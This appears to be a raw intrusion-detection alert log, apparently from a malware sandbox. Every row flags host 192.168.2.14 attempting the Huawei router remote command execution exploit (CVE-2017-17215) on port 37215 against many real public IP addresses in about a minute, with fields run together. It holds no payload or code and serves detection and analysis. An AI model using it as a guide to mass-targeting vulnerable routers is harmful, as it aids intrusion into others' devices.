                                                    07/10/24-08:26:59.683298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5053837215192.168.2.14123.102.128.57
                                                    07/10/24-08:26:15.834521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3396637215192.168.2.1441.74.233.186
                                                    07/10/24-08:27:22.460068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3644437215192.168.2.14157.160.190.39
                                                    07/10/24-08:27:23.957174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3952037215192.168.2.14157.4.220.197
                                                    07/10/24-08:27:22.835160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5065237215192.168.2.1441.67.123.226
                                                    07/10/24-08:27:33.873647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3610637215192.168.2.14157.78.138.25
                                                    07/10/24-08:26:36.378488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5570437215192.168.2.14157.62.237.153
                                                    07/10/24-08:26:53.134905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4474437215192.168.2.14209.242.71.38
                                                    07/10/24-08:27:02.962556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4011437215192.168.2.1424.63.199.118
                                                    07/10/24-08:26:41.330955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5812637215192.168.2.1441.142.186.154
                                                    07/10/24-08:27:11.556329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733837215192.168.2.1441.64.96.129
                                                    07/10/24-08:27:14.885642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4321237215192.168.2.1417.166.155.89
                                                    07/10/24-08:27:22.835160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3485037215192.168.2.14197.196.189.144
                                                    07/10/24-08:27:05.173254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4676437215192.168.2.14197.227.231.53
                                                    07/10/24-08:26:18.001692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4202237215192.168.2.14157.154.12.49
                                                    07/10/24-08:27:32.489604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3670237215192.168.2.1441.14.11.75
                                                    07/10/24-08:26:49.850872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5453237215192.168.2.1441.98.200.121
                                                    07/10/24-08:26:38.547817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3808437215192.168.2.14157.142.37.179
                                                    07/10/24-08:27:31.439490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317037215192.168.2.14157.89.151.215
                                                    07/10/24-08:26:52.045134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6019637215192.168.2.1441.132.27.194
                                                    07/10/24-08:27:33.803873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5681837215192.168.2.14197.160.183.156
                                                    07/10/24-08:27:14.807456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5746237215192.168.2.14157.48.238.227
                                                    07/10/24-08:27:33.834313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442637215192.168.2.14197.64.65.51
                                                    07/10/24-08:27:22.794160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5408837215192.168.2.14197.111.250.156
                                                    07/10/24-08:26:47.929335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3307637215192.168.2.14169.131.171.52
                                                    07/10/24-08:27:08.373909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4078237215192.168.2.14197.20.23.75
                                                    07/10/24-08:26:53.182396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5424837215192.168.2.14197.32.144.142
                                                    07/10/24-08:27:32.610911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5130037215192.168.2.14197.106.23.180
                                                    07/10/24-08:26:28.761249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5247237215192.168.2.14197.135.34.97
                                                    07/10/24-08:26:36.326786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4028037215192.168.2.1441.116.131.197
                                                    07/10/24-08:26:11.144777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4157637215192.168.2.14197.52.39.17
                                                    07/10/24-08:26:47.860758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3777437215192.168.2.1452.224.33.132
                                                    07/10/24-08:26:25.466944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038837215192.168.2.1460.184.165.166
                                                    07/10/24-08:26:47.959831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5979637215192.168.2.1441.196.214.252
                                                    07/10/24-08:27:17.103998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3415437215192.168.2.14140.173.171.218
                                                    07/10/24-08:27:03.004303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5871037215192.168.2.14197.140.203.100
                                                    07/10/24-08:27:23.921577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5086637215192.168.2.14129.164.70.85
                                                    07/10/24-08:27:28.082444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4112437215192.168.2.1441.66.17.12
                                                    07/10/24-08:27:28.169904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3382437215192.168.2.14157.173.234.16
                                                    07/10/24-08:26:33.171308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5110237215192.168.2.1441.194.228.186
                                                    07/10/24-08:26:26.578603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4760437215192.168.2.14197.234.179.98
                                                    07/10/24-08:26:41.382366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4152037215192.168.2.1485.236.146.92
                                                    07/10/24-08:26:25.460773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3327637215192.168.2.1418.12.187.89
                                                    07/10/24-08:26:14.624667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591037215192.168.2.14157.185.96.227
                                                    07/10/24-08:26:59.566054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5282237215192.168.2.14157.62.200.41
                                                    07/10/24-08:27:33.928939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056637215192.168.2.14157.118.187.176
                                                    07/10/24-08:26:59.612938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5018837215192.168.2.14211.215.9.162
                                                    07/10/24-08:27:10.595153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4818037215192.168.2.14161.112.142.207
                                                    07/10/24-08:26:25.453696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4319637215192.168.2.14197.39.6.74
                                                    07/10/24-08:26:55.385980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5388637215192.168.2.1441.155.97.110
                                                    07/10/24-08:26:29.752845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3879037215192.168.2.14197.223.156.47
                                                    07/10/24-08:26:29.878263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5679837215192.168.2.1454.37.228.88
                                                    07/10/24-08:26:28.778339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382637215192.168.2.1441.5.196.94
                                                    07/10/24-08:26:47.879237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4547837215192.168.2.14197.51.111.193
                                                    07/10/24-08:27:33.828822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4646837215192.168.2.1441.138.173.184
                                                    07/10/24-08:27:10.655390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3401837215192.168.2.1441.130.91.196
                                                    07/10/24-08:27:22.810148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4535437215192.168.2.14182.9.18.64
                                                    07/10/24-08:26:11.624081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4610237215192.168.2.14212.2.176.188
                                                    07/10/24-08:26:41.392423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3997837215192.168.2.14157.138.13.220
                                                    07/10/24-08:26:59.596849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3303237215192.168.2.14163.95.126.149
                                                    07/10/24-08:26:43.894191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5931037215192.168.2.14146.114.153.86
                                                    07/10/24-08:26:23.345555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4849837215192.168.2.14197.20.109.193
                                                    07/10/24-08:27:22.758689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6019037215192.168.2.14197.192.88.158
                                                    07/10/24-08:26:31.081032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5089037215192.168.2.1427.80.117.186
                                                    07/10/24-08:27:13.879681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3463437215192.168.2.1461.117.202.215
                                                    07/10/24-08:26:43.894192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5424837215192.168.2.14197.76.19.108
                                                    07/10/24-08:26:59.736311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5930037215192.168.2.14157.120.215.191
                                                    07/10/24-08:26:38.648548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5065037215192.168.2.14197.240.10.150
                                                    07/10/24-08:26:41.407237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734837215192.168.2.14157.130.190.190
                                                    07/10/24-08:27:08.389316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4833037215192.168.2.14197.218.182.252
                                                    07/10/24-08:26:53.177713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239037215192.168.2.1441.40.43.112
                                                    07/10/24-08:26:55.444062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5533837215192.168.2.14157.108.187.191
                                                    07/10/24-08:26:13.663247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191037215192.168.2.14197.144.119.38
                                                    07/10/24-08:27:24.953647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5320237215192.168.2.14152.219.159.237
                                                    07/10/24-08:27:33.837652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5323237215192.168.2.14197.179.35.40
                                                    07/10/24-08:26:51.917440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5958037215192.168.2.14197.14.184.31
                                                    07/10/24-08:27:05.101728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5812637215192.168.2.14197.108.199.225
                                                    07/10/24-08:26:59.524945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5244837215192.168.2.14157.94.129.192
                                                    07/10/24-08:27:24.878204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3529437215192.168.2.1441.34.182.57
                                                    07/10/24-08:26:20.155413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626437215192.168.2.1441.83.214.224
                                                    07/10/24-08:27:13.712614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5727437215192.168.2.14197.75.171.73
                                                    07/10/24-08:26:41.324840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3537637215192.168.2.1441.4.193.107
                                                    07/10/24-08:26:41.309274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3508237215192.168.2.14157.224.105.96
                                                    07/10/24-08:26:57.668884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5029037215192.168.2.1460.134.186.90
                                                    07/10/24-08:27:13.886782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098237215192.168.2.1441.43.34.74
                                                    07/10/24-08:26:42.366312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6090237215192.168.2.1441.135.142.29
                                                    07/10/24-08:27:23.959753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3511437215192.168.2.14197.158.65.192
                                                    07/10/24-08:27:24.893160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481437215192.168.2.1441.155.30.166
                                                    07/10/24-08:26:53.155624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5783837215192.168.2.14123.136.102.240
                                                    07/10/24-08:26:20.134235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176637215192.168.2.14157.33.104.223
                                                    07/10/24-08:27:14.853169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5451837215192.168.2.14197.37.47.157
                                                    07/10/24-08:27:11.551346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3947437215192.168.2.14197.143.27.110
                                                    07/10/24-08:26:15.868570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857637215192.168.2.1441.59.24.76
                                                    07/10/24-08:27:07.393552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4304237215192.168.2.14191.138.193.151
                                                    07/10/24-08:26:55.470817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3931237215192.168.2.1441.166.128.199
                                                    07/10/24-08:26:23.330913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4091637215192.168.2.14157.203.251.88
                                                    07/10/24-08:26:28.821569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4473437215192.168.2.14197.203.146.184
                                                    07/10/24-08:26:28.795318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3441237215192.168.2.14157.48.116.152
                                                    07/10/24-08:26:59.795467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5490037215192.168.2.14137.231.196.69
                                                    07/10/24-08:26:20.118074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5195637215192.168.2.14197.122.52.96
                                                    07/10/24-08:26:52.036336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566837215192.168.2.14197.240.127.137
                                                    07/10/24-08:27:17.034911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4357837215192.168.2.1491.190.96.60
                                                    07/10/24-08:26:38.568702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5994637215192.168.2.14157.78.51.89
                                                    07/10/24-08:26:57.646782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6064637215192.168.2.14157.6.111.209
                                                    07/10/24-08:27:02.819826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4726037215192.168.2.14213.110.238.132
                                                    07/10/24-08:26:59.633265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4272837215192.168.2.1441.113.235.71
                                                    07/10/24-08:27:02.834803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3426837215192.168.2.1442.155.202.47
                                                    07/10/24-08:26:53.127058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478037215192.168.2.14197.159.127.95
                                                    07/10/24-08:27:32.583920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5743437215192.168.2.1441.163.48.182
                                                    07/10/24-08:26:15.809769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3451037215192.168.2.14126.211.1.21
                                                    07/10/24-08:26:43.888134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5148837215192.168.2.1441.55.119.183
                                                    07/10/24-08:26:15.823696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5509037215192.168.2.14197.70.26.237
                                                    07/10/24-08:26:33.183618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5675837215192.168.2.14157.179.249.184
                                                    07/10/24-08:26:41.487331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3683637215192.168.2.14157.1.221.219
                                                    07/10/24-08:26:47.995601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5125437215192.168.2.14197.31.175.230
                                                    07/10/24-08:26:59.716345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3319037215192.168.2.14157.93.30.120
                                                    07/10/24-08:26:53.190112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4868237215192.168.2.14157.198.184.12
                                                    07/10/24-08:27:28.160478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5931437215192.168.2.14197.137.9.194
                                                    07/10/24-08:26:17.989369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4215437215192.168.2.14197.204.112.81
                                                    07/10/24-08:26:17.989941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4093637215192.168.2.1441.64.68.174
                                                    07/10/24-08:26:22.242541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266237215192.168.2.14187.181.226.105
                                                    07/10/24-08:26:55.332212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4094637215192.168.2.14191.97.141.31
                                                    07/10/24-08:26:59.848690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823637215192.168.2.14197.183.70.87
                                                    07/10/24-08:26:31.077497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695037215192.168.2.1441.145.134.131
                                                    07/10/24-08:26:41.540257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4313637215192.168.2.14197.129.106.226
                                                    07/10/24-08:26:47.746309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4969237215192.168.2.14157.180.148.46
                                                    07/10/24-08:26:15.842183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4401637215192.168.2.14197.81.189.215
                                                    07/10/24-08:26:59.703676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5398037215192.168.2.14157.58.155.54
                                                    07/10/24-08:26:25.428248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5066837215192.168.2.1441.215.146.158
                                                    07/10/24-08:27:17.067488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348837215192.168.2.14171.240.199.11
                                                    07/10/24-08:27:13.964289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428037215192.168.2.14157.163.248.6
                                                    07/10/24-08:27:22.474549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4247437215192.168.2.14197.233.250.94
                                                    07/10/24-08:26:11.469392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3670837215192.168.2.14101.129.97.51
                                                    07/10/24-08:26:26.483196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5599637215192.168.2.1441.93.57.217
                                                    07/10/24-08:26:13.845798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3457037215192.168.2.14197.237.24.115
                                                    07/10/24-08:26:36.441916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5865037215192.168.2.1441.65.3.231
                                                    07/10/24-08:27:32.572327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5209037215192.168.2.14157.178.42.136
                                                    07/10/24-08:26:42.373871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4507837215192.168.2.14197.8.222.95
                                                    07/10/24-08:26:15.864839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4372637215192.168.2.1412.222.37.72
                                                    07/10/24-08:26:47.931065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300637215192.168.2.14157.35.162.76
                                                    07/10/24-08:26:18.008583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3424837215192.168.2.1470.117.95.29
                                                    07/10/24-08:27:23.870319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3438837215192.168.2.14197.121.166.14
                                                    07/10/24-08:27:22.844415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5363637215192.168.2.14160.60.94.97
                                                    07/10/24-08:26:47.999319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3366837215192.168.2.1441.229.145.96
                                                    07/10/24-08:26:26.542199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256637215192.168.2.1441.84.64.255
                                                    07/10/24-08:26:34.187419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3982037215192.168.2.14157.42.253.180
                                                    07/10/24-08:27:08.379030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5971637215192.168.2.14221.82.210.152
                                                    07/10/24-08:26:15.869834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5271437215192.168.2.14157.67.181.239
                                                    07/10/24-08:26:59.771211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4714837215192.168.2.14197.150.154.95
                                                    07/10/24-08:27:22.758689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443237215192.168.2.1441.118.145.216
                                                    07/10/24-08:27:13.721350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482437215192.168.2.14157.39.81.138
                                                    07/10/24-08:26:57.525834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5897837215192.168.2.14157.135.176.113
                                                    07/10/24-08:27:24.901081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983237215192.168.2.1441.207.234.105
                                                    07/10/24-08:27:22.844415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3301037215192.168.2.14169.48.143.21
                                                    07/10/24-08:26:45.587142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4544237215192.168.2.14201.40.158.253
                                                    07/10/24-08:26:42.381146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5792437215192.168.2.14223.179.87.162
                                                    07/10/24-08:26:11.600235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5685037215192.168.2.1441.109.187.107
                                                    07/10/24-08:26:36.358429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5924037215192.168.2.14157.160.226.234
                                                    07/10/24-08:26:47.891770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4200037215192.168.2.14168.208.246.27
                                                    07/10/24-08:26:52.083078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5477437215192.168.2.1432.51.80.210
                                                    07/10/24-08:26:59.526504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852837215192.168.2.14157.63.127.4
                                                    07/10/24-08:26:25.469425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798237215192.168.2.1441.76.40.197
                                                    07/10/24-08:26:26.521470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4306837215192.168.2.14105.2.1.2
                                                    07/10/24-08:27:07.325434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3713437215192.168.2.1441.72.178.144
                                                    07/10/24-08:27:19.236089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3394037215192.168.2.1441.228.195.113
                                                    07/10/24-08:26:59.707139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5989437215192.168.2.14157.253.210.165
                                                    07/10/24-08:27:13.963360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4553037215192.168.2.14211.145.192.146
                                                    07/10/24-08:27:27.160309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4035037215192.168.2.14157.175.241.218
                                                    07/10/24-08:26:33.182534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922837215192.168.2.1445.175.48.130
                                                    07/10/24-08:26:59.645558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4491837215192.168.2.1441.223.125.87
                                                    07/10/24-08:26:33.206981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4354837215192.168.2.1441.219.120.153
                                                    07/10/24-08:26:25.454505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5289237215192.168.2.14116.3.228.234
                                                    07/10/24-08:27:11.514451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4831237215192.168.2.14202.206.29.161
                                                    07/10/24-08:27:19.198870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5565237215192.168.2.14141.2.48.230
                                                    07/10/24-08:26:52.081340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825037215192.168.2.14206.148.253.41
                                                    07/10/24-08:27:28.126116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4755437215192.168.2.1441.136.134.207
                                                    07/10/24-08:27:28.148356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3923437215192.168.2.1486.23.184.255
                                                    07/10/24-08:27:31.454702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4825037215192.168.2.1441.105.100.223
                                                    07/10/24-08:27:23.930240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5641237215192.168.2.14194.46.23.82
                                                    07/10/24-08:26:57.657742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3900837215192.168.2.14157.177.165.56
                                                    07/10/24-08:27:19.316090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3750237215192.168.2.14113.38.101.118
                                                    07/10/24-08:26:11.622181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3560437215192.168.2.1441.216.184.167
                                                    07/10/24-08:26:47.909610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104037215192.168.2.14156.24.26.218
                                                    07/10/24-08:26:23.355278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4784837215192.168.2.148.248.213.218
                                                    07/10/24-08:26:59.539411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4978437215192.168.2.14175.220.167.54
                                                    07/10/24-08:27:23.494634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6079837215192.168.2.14157.218.79.6
